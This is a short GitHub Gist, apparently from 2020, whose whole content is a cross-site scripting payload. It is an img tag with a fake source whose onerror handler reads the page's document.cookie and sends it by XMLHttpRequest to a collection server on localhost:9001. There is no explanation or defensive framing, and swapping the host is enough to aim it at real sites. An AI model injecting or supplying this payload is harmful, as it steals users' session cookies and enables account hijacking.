Created
March 14, 2020 23:22
-
-
Save vxermx/b1833e23cfb4f349566aa2b5adaf2c4c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img | |
| src='/fake' | |
| onerror="if (document.cookie!=='teehee' && document.cookie !== '') {var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:9001/'+document.cookie); xhr.send();}" | |
| /> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment